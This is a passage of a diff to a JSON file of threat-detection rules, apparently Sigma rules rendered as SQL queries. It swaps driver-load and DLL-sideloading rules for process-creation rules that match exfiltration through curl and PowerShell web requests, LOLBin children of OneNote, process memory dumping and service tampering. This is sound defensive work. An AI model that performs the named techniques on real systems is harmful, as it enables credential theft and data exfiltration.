'95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003', '26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7', '42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498', '1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22', '9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de', 'fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', '175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347', '8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026', '52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', 'ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 'e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220', '1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b', '029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df', '1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557', 'c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522', 'a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512', '5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e', 'e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4', '7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230', '97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56', '8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f', '09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184', '2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d', '5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683', 'f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54', '2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b', '1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e', '84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42', '0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c', 'a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b', '4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219', '6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a', 'c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747', 'd3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34', '3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_drivers.yml" + "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" }, { - "title": "Vulnerable WinRing0 Driver Load", - "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "status": "experimental", - "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "description": "Detects a suspicious svchost process start", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentProcessName = '') OR (ParentProcessName = '') OR (ParentProcessName = '-')))" ], - "filename": "driver_load_win_vuln_winring0_driver.yml" + "filename": "proc_creation_win_svchost_susp_parent_process.yml" }, { - "title": "Usage Of Malicious POORTRY Signed Driver", - "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "title": "Suspicious Microsoft OneNote Child Process", + "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", "status": "experimental", - "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.privilege_escalation", - "attack.t1543", - "attack.t1068" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "File located in the AppData folder with trusted signature" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" ], - "filename": "driver_load_win_mal_poortry_driver.yml" + "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" }, { - "title": "Vulnerable GIGABYTE Driver Load", - "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", - "status": "experimental", - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "status": "test", + "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", + "author": "Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.privilege_escalation", + "attack.persistence", "attack.t1543.003" ], "falsepositives": [ @@ -5668,99 +5500,95 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_gigabyte_driver.yml" + "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" }, { - "title": "Suspicious Driver Load from Temp", - "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", - "status": "test", - "description": "Detects a driver load from a temporary directory", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Data Exfiltration Activity Via CommandLine Tools", + "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "status": "experimental", + "description": "Detects the use of various CLI utilities exfiltrating data via web requests", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "There is a relevant set of false positives depending on applications in the environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" ], - "filename": "driver_load_win_susp_temp_use.yml" + "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" }, { - "title": "Vulnerable HW Driver Load", - "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", - "status": "experimental", - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "title": "Renamed Whoami Execution", + "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "status": "test", + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'whoami.exe' AND NOT (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_hw_driver.yml" + "filename": "proc_creation_win_renamed_whoami.yml" }, { - "title": "DLL Sideloading Of DBGHELP.DLL", - "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "title": "CreateDump Process Dump", + "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "status": "experimental", - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" ], - "filename": "image_load_side_load_dbghelp_dll.yml" + "filename": "proc_creation_win_createdump_lolbin_execution.yml" }, { - "title": "Potential System DLL Sideloading From Non System Locations", - "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - XORDump Execution", + "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "status": "test", + "description": "Detects suspicious use of XORDump process memory dumping utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + "Another tool that uses the command line switches of XORdump" ], "level": "high", 